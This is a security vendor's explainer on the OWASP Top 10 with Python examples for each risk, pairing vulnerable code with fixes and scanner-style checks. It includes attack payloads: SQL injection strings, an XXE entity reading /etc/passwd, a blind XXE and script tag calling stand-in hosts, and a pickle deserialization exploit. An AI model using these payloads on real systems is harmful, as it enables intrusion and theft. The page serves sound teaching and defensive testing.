OWASP (the Open Web Application Security Project) is a non-profit community that publishes vendor-neutral information and guidance on the security of web applications and software.
Every few years the OWASP community comes together to review the ten most critical web application security risks, analysing vulnerability data spanning hundreds of organisations and over 100,000 real-world applications.
Each risk is assessed on factors such as prevalence, detectability, exploitability and potential impact to produce the final ranked list.
So let’s take a look at what’s included and why AppCheck incorporates these vulnerabilities into its standard scan templates, reporting, dashboards and more…
Injection flaws are the most common class of vulnerability found in web applications. They usually result from unfiltered user input being concatenated directly into a command or database query, so that characters in the input are interpreted as part of the command rather than as data.
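As an added illustration (example code written for this page, not AppCheck’s own checks), here is the flaw in its simplest SQL form beside the parameterised fix, together with the boolean differential test a scanner uses to decide that input is reaching the database. The in-memory database, table and rows are constructed for the example.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory database for the example; not from any real application."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user")],
    )
    return conn


def search_vulnerable(conn, name):
    # The user-supplied string is pasted into the statement text, so a quote
    # character in the input closes the literal and the rest is parsed as SQL.
    query = "SELECT username, role FROM users WHERE username = '%s'" % name
    return conn.execute(query).fetchall()


def search_fixed(conn, name):
    # Parameterised query: the value travels separately from the statement and
    # can only ever be compared as data, whatever characters it contains.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (name,)
    ).fetchall()


# Tautology payload: closes the string literal and makes the WHERE clause always true.
TAUTOLOGY = "' OR '1'='1"


def boolean_probe(search, conn, value):
    """The kind of differential check a scanner uses to build its rationale.

    Two inputs that differ only in an appended true/false SQL condition must
    behave identically if the application treats the input as data. If the
    responses differ, the condition was evaluated by the database."""
    true_case = search(conn, value + "' AND '1'='1")
    false_case = search(conn, value + "' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = build_demo_db()
    print(search_vulnerable(db, TAUTOLOGY))             # every row comes back
    print(search_fixed(db, TAUTOLOGY))                  # [] : no user has that literal name
    print(boolean_probe(search_vulnerable, db, "alice"))  # True: the condition was evaluated
    print(boolean_probe(search_fixed, db, "alice"))       # False
```

The probe is deliberately content-free: it does not need to read data out, only to observe that two syntactically different inputs produce different responses, which is why it also works against endpoints that return nothing but a status code.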
The AppCheck Vulnerability Analysis Engine runs a number of checks for a wide variety of injection attacks to build a rationale for why it believes an application is vulnerable. Where it is, AppCheck provides an example of the payload it used to confirm the vulnerability, along with technical detail and remediation advice. Browser and application frameworks evolve constantly, and new techniques and vectors are discovered all the time.
Injection vulnerabilities that AppCheck checks for include:
Sometimes authentication is implemented incorrectly, or an application contains routes to sensitive data that have not been placed behind an authentication check. In other cases the session token itself is the weak point, either because it can be enumerated or because it never expires. Either way an attacker may be able to guess the session token of another user (an administrator, say), take over their session and steal data.
While crawling an application AppCheck analyses the session mechanism for enumerability by establishing many sessions and examining the tokens issued. It also looks out for weakly implemented authentication, for example “long response” 302 redirects, where the application renders the content of a restricted view into the response body but then sends a redirect in the headers. A browser follows the redirect, but anything that reads the raw response gets the protected content.
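The two checks described above, written out as an added example (this is illustrative code for the page, not AppCheck’s implementation). The sequential token sample, the “random” tokens generated with the secrets module, and the three HTTP responses are all constructed here; the 64-bit entropy floor is the commonly cited minimum for session identifiers.

```python
import math
import re
import secrets

# Constructed samples of the tokens a scanner collects by starting several sessions.
SEQUENTIAL_TOKENS = ["1000231", "1000232", "1000233", "1000235", "1000236", "1000238"]
RANDOM_TOKENS = [secrets.token_hex(16) for _ in range(8)]  # stand-in for a sound scheme


def estimated_entropy_bits(tokens):
    """Crude upper bound: alphabet actually used, times positions that vary.

    Fixed prefixes or suffixes shared by every token contribute nothing, which
    is how a 'random-looking' token can still carry only a few bits."""
    alphabet = set("".join(tokens))
    length = min(len(t) for t in tokens)
    varying = sum(1 for i in range(length) if len({t[i] for t in tokens}) > 1)
    return varying * math.log2(len(alphabet))


def tokens_look_predictable(tokens, minimum_bits=64):
    """Return the reasons a batch of session tokens should be reported, if any."""
    reasons = []
    if len(set(tokens)) != len(tokens):
        reasons.append("the same token was issued to more than one session")
    if all(t.isdigit() for t in tokens):
        values = sorted(int(t) for t in tokens)
        if all(b - a <= 100 for a, b in zip(values, values[1:])):
            reasons.append("tokens are numeric and increase in small steps (enumerable)")
    bits = estimated_entropy_bits(tokens)
    if bits < minimum_bits:
        reasons.append(f"about {bits:.0f} bits of entropy, below the {minimum_bits}-bit floor")
    return reasons


# Constructed responses as (status, headers, body).
LEAKY_REDIRECT = (
    302,
    {"Location": "/login", "Content-Type": "text/html"},
    "<html><body><h1>Admin dashboard</h1><table><tr><td>alice</td><td>admin</td></tr>"
    "</table></body></html>",
)
CLEAN_REDIRECT = (302, {"Location": "/login"}, "")
NORMAL_PAGE = (200, {"Content-Type": "text/html"}, "<html><body><h1>Public page</h1></body></html>")

MARKUP_THAT_MEANS_CONTENT = re.compile(r"<(form|table|h1|input|textarea)\b", re.IGNORECASE)


def redirect_leaks_content(response):
    """Flag a 'long response' redirect: the server rendered the protected view into
    the body and then added a Location header. A browser follows the header, but a
    client that ignores it (curl, a proxy, a scanner) simply reads the page."""
    status, headers, body = response
    if status not in (301, 302, 303, 307, 308):
        return False
    if not any(name.lower() == "location" for name in headers):
        return False
    return len(body) > 1024 or MARKUP_THAT_MEANS_CONTENT.search(body) is not None


if __name__ == "__main__":
    print(tokens_look_predictable(SEQUENTIAL_TOKENS))
    print(tokens_look_predictable(RANDOM_TOKENS))
    print(redirect_leaks_content(LEAKY_REDIRECT), redirect_leaks_content(CLEAN_REDIRECT))
```

The entropy estimate is only an upper bound on what the server could have used; a token that passes it can still be predictable (a timestamp or a hash of the username, for instance), so a scanner treats this as a screening check rather than proof of a sound implementation.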
AppCheck also includes configurable password-guessing modules to identify weak account credentials on systems such as:
Sensitive data exposure is usually the accidental exposure of files or folders that should not be publicly accessible: a hidden “invoices” folder provided for the convenience of remote workers, say, or a “.git” directory accidentally served from the root of the web server, which contains the complete source history of the application.
AppCheck performs “brute force” discovery, meaning it requests thousands of paths, collected in the wild through manual penetration testing, that are likely to exist. Such paths would not be found by a regular crawl because nothing within the application links to them, but by requesting them and examining how the application responds AppCheck can bring them to your attention.
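The part of forced browsing that is easy to get wrong is telling a hit from a “soft 404” (an HTTP 200 carrying a friendly not-found page). The added example below, written for this page rather than taken from AppCheck, requests a path that cannot exist first and uses that response as the baseline; the fake site, its soft-404 template and the five-entry wordlist are all constructed.

```python
import secrets
from difflib import SequenceMatcher

SOFT_404_TEMPLATE = (
    "<html><head><title>Not found</title></head><body>"
    "<h1>Sorry, we could not find {path}</h1>"
    "<p>The page may have moved. Use the menu to find what you were looking for, "
    "or return to the home page.</p></body></html>"
)

# Constructed stand-in for a web server: a few real paths, everything else a
# soft 404 (HTTP 200 with a not-found page that echoes the requested path).
FAKE_SITE = {
    "/": (200, "<html><body><h1>Welcome</h1></body></html>"),
    "/.git/HEAD": (200, "ref: refs/heads/master\n"),
    "/invoices/": (403, "<html><body><h1>Forbidden</h1></body></html>"),
}


def fake_fetch(path):
    return FAKE_SITE.get(path, (200, SOFT_404_TEMPLATE.format(path=path)))


# A few entries of the kind a pen-test derived wordlist holds (constructed here).
WORDLIST = ["/admin/", "/backup.zip", "/.git/HEAD", "/invoices/", "/phpinfo.php"]


def naive_probe(fetch, candidates):
    """Status code only: on a soft-404 site every guess looks like a hit."""
    return [p for p in candidates if fetch(p)[0] == 200]


def baseline_probe(fetch, candidates, similarity=0.9):
    """Learn what 'not found' looks like on this host from a path that cannot
    exist, then report only responses that differ from it. A 403 or other
    non-baseline status is still a finding: the path exists."""
    base_status, base_body = fetch("/" + secrets.token_hex(8))
    found = []
    for path in candidates:
        status, body = fetch(path)
        if status != base_status:
            found.append((path, status))
        elif SequenceMatcher(None, base_body, body, autojunk=False).ratio() < similarity:
            found.append((path, status))
    return found


if __name__ == "__main__":
    print(naive_probe(fake_fetch, WORDLIST))     # four 'hits', two of them soft 404s
    print(baseline_probe(fake_fetch, WORDLIST))  # [('/.git/HEAD', 200), ('/invoices/', 403)]
```

Because the soft-404 page echoes the path, exact comparison would fail; the similarity ratio tolerates that while still separating a real `.git/HEAD` body from the template. On a live target the baseline should be re-sampled per directory, since many applications return different not-found pages for different sections.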
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files via the file:// URI handler, to reach internal file shares, to port-scan internal hosts, and in some configurations to achieve remote code execution or denial of service.
AppCheck injects various XXE payloads to exploit misconfigured XML parsing, including the harder blind case, where nothing from the entity is reflected in the response and out-of-band feedback is required to detect the vulnerability.
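An added example of both payload shapes and of what separates a vulnerable parser from a hardened one, using Python’s xml.sax (expat) parser; this is illustrative code for the page, not AppCheck’s own payloads. The two XML documents, the fake file content and the hostname collaborator.example are constructed; the entity resolver serves that fake content instead of opening the URI, so the example never reads the real /etc/passwd but still shows whether the parser tried to.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Constructed in-band XXE: an internal DTD subset declares a general entity whose
# replacement text comes from a file:// URI, then references it in content.
XXE_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    b'<order><customer>&xxe;</customer></order>'
)

# Constructed blind variant: a parameter entity pulls a DTD from the attacker's
# host. Nothing is reflected in the response; the fetch itself is the signal.
BLIND_XXE_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order [\n'
    b'  <!ENTITY % dtd SYSTEM "http://collaborator.example/evil.dtd">\n'
    b'  %dtd;\n'
    b']>\n'
    b'<order><customer>nothing reflected here</customer></order>'
)

FAKE_FILE_CONTENT = b"root:x:0:0:root:/root:/bin/bash"  # stand-in for /etc/passwd


class RecordingResolver(EntityResolver):
    """Records every external entity the parser asks for and serves fake bytes."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(FAKE_FILE_CONTENT))
        return source


class TextCollector(ContentHandler):
    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_untrusted(xml_bytes, allow_external_entities):
    """Return (text content, external URIs the parser tried to resolve)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    resolver, handler = RecordingResolver(), TextCollector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.text).strip(), resolver.requested


def has_doctype(xml_bytes):
    """Cheapest defence for applications that never need a DTD: refuse documents
    that declare one before any parser sees them. Both in-band and blind XXE need
    a DOCTYPE for their entity declarations. Decode first: a raw byte search
    would miss a UTF-16 document."""
    try:
        if xml_bytes[:2] in (b"\xff\xfe", b"\xfe\xff"):
            text = xml_bytes.decode("utf-16")
        else:
            text = xml_bytes.decode("utf-8")
    except UnicodeDecodeError:
        return True  # undecodable input is rejected rather than guessed at
    return "<!DOCTYPE" in text


if __name__ == "__main__":
    print(parse_untrusted(XXE_PAYLOAD, allow_external_entities=True))   # file content leaks
    print(parse_untrusted(XXE_PAYLOAD, allow_external_entities=False))  # ('', [])
    print(has_doctype(XXE_PAYLOAD), has_doctype(BLIND_XXE_PAYLOAD))
```

The blind payload is only inspected here, not parsed: with external entities enabled the parser would reach out to the attacker-controlled host, and in a scan that outbound request is what the out-of-band listener waits for. Disabling external general entities (and, for other parsers, DTD processing altogether) is the fix; the DOCTYPE pre-check is a second line of defence for code paths that cannot control the parser configuration.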
Similar to “Broken Authentication and Session Management”, this is where routes or views within the application are not properly protected. For example, it is not uncommon to find that admin controls are merely hidden from the application menu: the function itself is not restricted from an ordinary user, and the application relies on nobody noticing it.
AppCheck attempts every route it discovers during a crawl, both as an authenticated user and as an unauthenticated one, and reports the results. Access control is validated by attempting to reach components that should be restricted, or should require prior authentication, and recording which ones fail to protect the resource.
Insecure or superficial access control that simply hides components without properly securing them is identified the same way.
Because every application is different, AppCheck cannot always rule on whether a given route is meant to be reachable: it lacks the business context. It does, however, present the full list in its report for review.
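An added example of the “hidden but not enforced” flaw and of the differential check that finds it (illustrative code for this page, not AppCheck’s engine). The session store, the two users, the handlers and the route tables are constructed; the decorator shows where the check has to live for the route to be actually protected.

```python
from functools import wraps


class Forbidden(Exception):
    """Raised when a caller lacks the role a route requires."""


# Constructed session store: token -> identity. An unknown or missing token is anonymous.
SESSIONS = {
    "tok-alice": {"name": "alice", "role": "admin"},
    "tok-bob": {"name": "bob", "role": "user"},
}
ANONYMOUS = {"name": "anonymous", "role": "guest"}


def current_user(session_token):
    return SESSIONS.get(session_token, ANONYMOUS)


def requires_role(*roles):
    """Enforce the check in the handler itself, not in the menu that links to it."""
    def decorate(handler):
        @wraps(handler)
        def wrapper(session_token, target):
            user = current_user(session_token)
            if user["role"] not in roles:
                raise Forbidden(f"{user['name']} may not call {handler.__name__}")
            return handler(session_token, target)
        return wrapper
    return decorate


def render_menu(session_token):
    items = ["Home", "Profile"]
    if current_user(session_token)["role"] == "admin":
        items.append("Delete user")  # hiding the link is presentation, not a control
    return items


def view_profile(session_token, target):
    return f"profile of {current_user(session_token)['name']}"


def delete_user_vulnerable(session_token, target):
    # No check at all: the developer assumed only admins would ever find this route.
    return f"deleted {target}"


@requires_role("admin")
def delete_user_fixed(session_token, target):
    return f"deleted {target}"


VULNERABLE_ROUTES = {"/profile": view_profile, "/admin/delete-user": delete_user_vulnerable}
FIXED_ROUTES = {"/profile": view_profile, "/admin/delete-user": delete_user_fixed}


def differential_access_check(routes, privileged_token, low_privilege_token):
    """What a scanner does with the routes it crawled: call each one as a
    low-privilege (or anonymous) user and report those that answer exactly as
    they do for the privileged user. A refusal is the correct outcome."""
    findings = []
    for path, handler in routes.items():
        try:
            low = handler(low_privilege_token, "victim")
        except Forbidden:
            continue
        high = handler(privileged_token, "victim")
        if low == high:
            findings.append(path)
    return findings


if __name__ == "__main__":
    print(render_menu("tok-bob"))                                   # no admin item shown...
    print(delete_user_vulnerable("tok-bob", "alice"))               # ...but the call still works
    print(differential_access_check(VULNERABLE_ROUTES, "tok-alice", "tok-bob"))  # ['/admin/delete-user']
    print(differential_access_check(FIXED_ROUTES, "tok-alice", "tok-bob"))       # []
```

Two caveats a practitioner will recognise: `/profile` is not flagged because the two users legitimately get different answers, which is the same comparison that leaves a scanner unable to judge routes whose responses differ for business reasons; and calling a state-changing route such as delete-user with a real low-privilege session has side effects, so live checks of this kind belong in a test environment or behind safe (read-only) request variants.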
This category covers out-of-date or unpatched frameworks and the stack they sit on. Often the fix is simply a matter of changing settings within the stack to harden the setup; for instance, many default web server TLS configurations still offer cipher suites and protocol versions with known weaknesses.
AppCheck maintains a database of common configuration faults and out-of-date or unpatched frameworks and will flag these where detected.
If configured to do so, AppCheck will also perform a comprehensive infrastructure assessment against all IP addresses and web applications defined within the scope.
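The TLS example in the text, shown as an added illustration with Python’s ssl module (not AppCheck’s checks): a legacy-style context beside a hardened one, and a small audit over the OpenSSL cipher descriptions that `SSLContext.get_ciphers()` returns. The sample cipher list is constructed in that shape; the weak-name markers and the pre-TLS-1.2 protocol labels are assumptions of this example and should be extended to local policy.

```python
import ssl

# Substrings in OpenSSL cipher names that mark a suite as not fit for use:
# RC4, single/triple DES ("DES-CBC3"), NULL encryption, export grades, MD5 MACs,
# RC2, and anonymous (unauthenticated) DH/ECDH.
WEAK_MARKERS = ("RC4", "DES", "NULL", "EXP", "MD5", "RC2", "ADH", "AECDH")
# Protocol labels get_ciphers() reports for suites that predate TLS 1.2.
LEGACY_PROTOCOLS = ("SSLv2", "SSLv3", "TLSv1", "TLSv1.0", "TLSv1.1")

# Constructed, in the shape get_ciphers() returns (only the fields used here).
LEGACY_CIPHERS_SAMPLE = [
    {"name": "ECDHE-RSA-AES128-GCM-SHA256", "protocol": "TLSv1.2"},
    {"name": "DES-CBC3-SHA", "protocol": "SSLv3"},
    {"name": "RC4-MD5", "protocol": "SSLv3"},
    {"name": "AES128-SHA", "protocol": "SSLv3"},
]


def audit_cipher_list(ciphers):
    """Names of suites a scanner would flag: weak algorithms or pre-1.2 suites."""
    flagged = []
    for cipher in ciphers:
        name = cipher["name"]
        if any(marker in name for marker in WEAK_MARKERS) or cipher.get("protocol") in LEGACY_PROTOCOLS:
            flagged.append(name)
    return flagged


def legacy_server_context():
    """The shape of a default or legacy setup: old protocol floor and every
    suite OpenSSL will offer at security level 0. Modern OpenSSL builds may
    refuse some of this outright."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    ctx.set_ciphers("ALL:@SECLEVEL=0")
    return ctx


def hardened_server_context():
    """TLS 1.2 as the floor, forward-secret AEAD suites only, no compression."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5")
    ctx.options |= ssl.OP_NO_COMPRESSION
    return ctx


if __name__ == "__main__":
    print(audit_cipher_list(LEGACY_CIPHERS_SAMPLE))
    try:
        print(audit_cipher_list(legacy_server_context().get_ciphers()))
    except (ssl.SSLError, ValueError) as exc:
        print("this OpenSSL build refuses the legacy settings:", exc)
    print(audit_cipher_list(hardened_server_context().get_ciphers()))  # []
```

Running the audit against the live context rather than a static list matters because the suites actually offered depend on the OpenSSL build and its security level, not only on the configuration string.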
Cross-site scripting (XSS) is a type of injection attack in which an attacker injects JavaScript into an application so that it runs in another user’s browser. Often thought of as an attack against the users of an application rather than the application itself, more involved XSS attacks target the administration and back-office systems of an application (second-order attacks).
As with other injection attacks, AppCheck uses reasoning to determine whether an application is vulnerable and presents its case within the vulnerability details. In the best case AppCheck reports the vulnerability as “confirmed”, meaning it has successfully executed the injected JavaScript in real browsers. AppCheck can also detect second-order injection using our “Sentinel” service. Sentinel listens for a number of signals to assist AppCheck in attacking an application, among them our second-order injection payloads calling home. These can sometimes take weeks to show up after a scan has completed, because they fire only when some back-office process handles the stored payload, so if a second-order injection is detected AppCheck will send you a notification to make you aware of it.
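An added example of the flaw and of the call-home idea described above, written for this page (it is not AppCheck’s or Sentinel’s code). It pairs an unescaped comment template with its encoded fix, and shows why each injection point gets its own token: a request arriving at the listener weeks later can then be traced back to the scan and parameter that planted it. The listener hostname sentinel.example and the comment template are assumptions of the example.

```python
import html
import re
import secrets

# Hypothetical listener host for call-home payloads (an assumption of this example).
CALLBACK_HOST = "sentinel.example"

_injections = {}  # token -> (scan id, where the payload was submitted)


def render_comment_vulnerable(author, body):
    # User text is interpolated straight into the markup.
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_fixed(author, body):
    # Output encoding for an HTML text context; an attribute or JS context
    # would need its own encoder, which is why "escape everything" is not one call.
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def make_canary_payload(scan_id, location):
    """One unique token per injection point. If the script ever loads, whether in
    the page under test or in a back-office view weeks later, the request to the
    listener carries the token and can be attributed to its origin."""
    token = secrets.token_hex(8)
    _injections[token] = (scan_id, location)
    return f'<script src="//{CALLBACK_HOST}/{token}.js"></script>', token


def payload_survives_unescaped(rendered_html, token):
    """In-band first pass: the tag reached the page intact. A real confirmation
    then loads the page in a browser and waits for the listener to be hit."""
    return f'<script src="//{CALLBACK_HOST}/{token}.js">' in rendered_html


def attribute_callback(request_path):
    """Listener side: GET /<token>.js arrives, possibly long after the scan."""
    match = re.fullmatch(r"/([0-9a-f]{16})\.js", request_path)
    return _injections.get(match.group(1)) if match else None


if __name__ == "__main__":
    payload, token = make_canary_payload("scan-42", "POST /comment body")
    print(render_comment_vulnerable("eve", payload))  # script tag intact
    print(render_comment_fixed("eve", payload))       # &lt;script ...&gt; as inert text
    print(attribute_callback(f"/{token}.js"))         # ('scan-42', 'POST /comment body')
```

A string match on the rendered page is only a hint; the same markup inside a `<textarea>` or a comment node never executes, which is why the text above distinguishes a “confirmed” finding (script actually ran in a browser) from a reasoned one.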
AppCheck covers a range of XSS variants including:
Insecure deserialization often leads to remote code execution. Even where deserialization flaws do not result in code execution, they can be used for replay attacks, injection attacks and privilege escalation.
As part of its injection checks, AppCheck attempts to exploit both generic and framework-specific deserialization vulnerabilities across a wide variety of frameworks and libraries.
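An added example of why deserializing untrusted bytes is code execution, using Python’s pickle as a stand-in for the Java, .NET and PHP serialisers the category covers (illustrative code for this page, not AppCheck’s payloads). The “exploit” calls a harmless recording function instead of a shell so it can be run safely; the allow-list in the restricted loader is constructed and would be tailored to the types an application genuinely needs.

```python
import io
import pickle

EXECUTED = []  # records side effects so the example can prove code ran


def attacker_side_effect(message):
    """Stands in for os.system or similar; a real payload would not be this polite."""
    EXECUTED.append(message)
    return message


class Exploit:
    # A pickled object may name any importable callable plus its arguments, and
    # the loader invokes it. That feature is what turns deserialization into RCE.
    def __reduce__(self):
        return (attacker_side_effect, ("code ran during unpickling",))


def build_malicious_payload():
    return pickle.dumps(Exploit())


def build_benign_payload():
    return pickle.dumps({"order": 42, "items": ["a", "b"]})


def unsafe_loads(data):
    # pickle.loads on untrusted bytes executes whatever the payload names.
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve globals only from an explicit allow-list; anything else is refused
    before a callable can be invoked. Plain containers and scalars never go
    through find_class, so ordinary data still loads."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True when the restricted loader refuses the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    payload = build_malicious_payload()
    print(unsafe_loads(payload), EXECUTED)   # the recorder ran during loading
    print(is_rejected(payload))              # True
    print(safe_loads(build_benign_payload()))
```

The allow-list approach is the right shape for any serialiser that resolves class names from the stream (Java’s ObjectInputFilter and the .NET binder hooks do the same job); the better fix is to stop accepting native serialised objects from untrusted sources at all and use a data-only format.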
With the huge number of third-party components freely available on the internet, it is common for a developer to find a component or library and include it in an application to solve a problem or provide a widget. Vulnerabilities are regularly discovered in these components afterwards; sometimes a fixed version is released, and sometimes the component has simply been abandoned.
AppCheck identifies the libraries and JavaScript components used within an application, using real browsers to confirm their presence and, where possible, their version. These are compared against a regularly updated database containing thousands of known vulnerabilities in content management systems and components, and matches are reported. In some cases static analysis of the component’s code is performed and any suspect areas are highlighted in the finding.
The following dedicated assessment components are also provided by AppCheck:
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to attack systems further, maintain persistence, pivot to more systems, and tamper with, extract or destroy data. Most breach studies show that the time to detect a breach is over 200 days, and that breaches are typically detected by external parties rather than by internal processes or monitoring.
By generating a realistic attack scenario, an AppCheck scan exercises monitoring and logging solutions and so can highlight weaknesses and omissions in current processes; our security team is always on hand to offer advice on best practice.
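The question a scan of this kind puts to a monitoring team is simply “did you see it?”. As an added example (written for this page, not part of AppCheck), here is the minimum detection logic that should fire on the two noisiest behaviours described earlier, path brute force and password guessing, run over a constructed combined-format access log containing one client doing each plus a normal visitor. The thresholds and window are assumptions to tune locally.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format as written by Apache and nginx by default.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+'
)


def _constructed_log():
    """Constructed sample: one client guessing paths, one guessing passwords,
    and a normal visitor. Not captured from a real server."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

    lines = [
        line("198.51.100.7", 0, "GET", "/", 200),
        line("198.51.100.7", 4, "GET", "/products", 200),
        line("198.51.100.7", 9, "GET", "/prodcuts", 404),   # a typo, not an attack
        line("198.51.100.7", 12, "POST", "/login", 401),     # one mistyped password
        line("198.51.100.7", 20, "POST", "/login", 200),
    ]
    lines += [line("203.0.113.5", i * 1.2, "GET", f"/backup{i}.zip", 404) for i in range(25)]
    lines += [line("203.0.113.8", 30 + i * 2, "POST", "/login", 401) for i in range(12)]
    return "\n".join(lines)


SAMPLE_LOG = _constructed_log()


def parse_line(line):
    m = LOG_LINE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "path": m["path"],
        "status": int(m["status"]),
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
    }


def _max_in_window(times, window):
    """Largest number of events falling inside any span of length `window`."""
    times = sorted(times)
    best, start = 0, 0
    for i, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, i - start + 1)
    return best


RULES = [  # (status code, threshold within one window, label)
    (404, 20, "path brute force"),
    (401, 10, "password guessing"),
]


def detect_scans(log_text, window=timedelta(seconds=60)):
    """Flag clients whose count of a status code inside one window reaches a
    rule's threshold. Returns (ip, label, count) tuples in stable order."""
    by_client = defaultdict(lambda: defaultdict(list))
    for raw in log_text.splitlines():
        event = parse_line(raw)
        if event:
            by_client[event["ip"]][event["status"]].append(event["ts"])
    alerts = []
    for ip, per_status in by_client.items():
        for status, threshold, label in RULES:
            count = _max_in_window(per_status.get(status, []), window)
            if count >= threshold:
                alerts.append((ip, label, count))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(alert)
```

If a scan of the kind described above completes and nothing resembling these two alerts reaches the people on call, the gap is in collection or alerting rather than in the attacker’s stealth; the same logic applied to authentication logs rather than web access logs catches the credential-guessing modules against non-HTTP services.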
Whilst all the vulnerabilities above are included in standard AppCheck scans, there are hundreds more out there. If you would like to know how AppCheck deals with a specific vulnerability, or would like a demonstration of the system, please get in contact with us at: info@localhost
In the meantime download our OWASP Top 10 PDF here.
No software to download or install.
Contact us or call us 0113 887 8380
AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations’ websites, applications, network and cloud infrastructure. AppCheck is authorised by the Common Vulnerabilities and Exposures (CVE) Program as a CVE Numbering Authority (CNA).